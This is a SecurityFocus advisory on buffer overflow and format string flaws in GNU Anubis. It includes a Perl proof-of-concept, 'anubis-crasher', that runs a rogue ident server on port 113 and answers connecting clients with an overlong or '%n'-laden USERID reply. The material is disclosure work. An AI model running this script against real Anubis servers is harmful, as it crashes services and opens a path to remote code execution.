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source: https://www.securityfocus.com/bid/9772/info
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GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'.
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These vulnerabilities have been reported to exist in GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, and 3.9.93. It is possible that other versions are affected as well.
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These issues are undergiong further analysis, they will be divided into separate BIDs as analysis is completed.
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#!/usr/bin/perl --
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# anubis-crasher
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# Ulf Harnhammar 2004
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# I hereby place this program in the Public Domain.
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use IO::Socket;
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sub usage()
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{
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die "usage: $0 type\n".
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"type is 'a' (buffer overflow) or 'b' (format string bug).\n";
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} # sub usage
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$port = 113;
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usage() unless @ARGV == 1;
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$type = shift;
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usage() unless $type =~ m|^[ab]$|;
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$send{'a'} = 'U' x 400;
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$send{'b'} = '%n' x 28;
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$sendstr = $send{$type};
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$server = IO::Socket::INET->new(Proto => 'tcp',
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LocalPort => $port,
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Listen => SOMAXCONN,
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Reuse => 1) or
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die "can't create server: $!";
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while ($client = $server->accept())
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{
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$client->autoflush(1);
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print "got a connection\n";
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$input = <$client>;
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$input =~ tr/\015\012//d;
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print "client said $input\n";
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# $wait = <STDIN>;
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# $wait = 'be quiet, perl -wc';
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$output = "a: USERID: a:$sendstr";
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print $client "$output\n";
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print "I said $output\n";
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close $client;
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print "disconnected\n";
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} # while client=server->accept |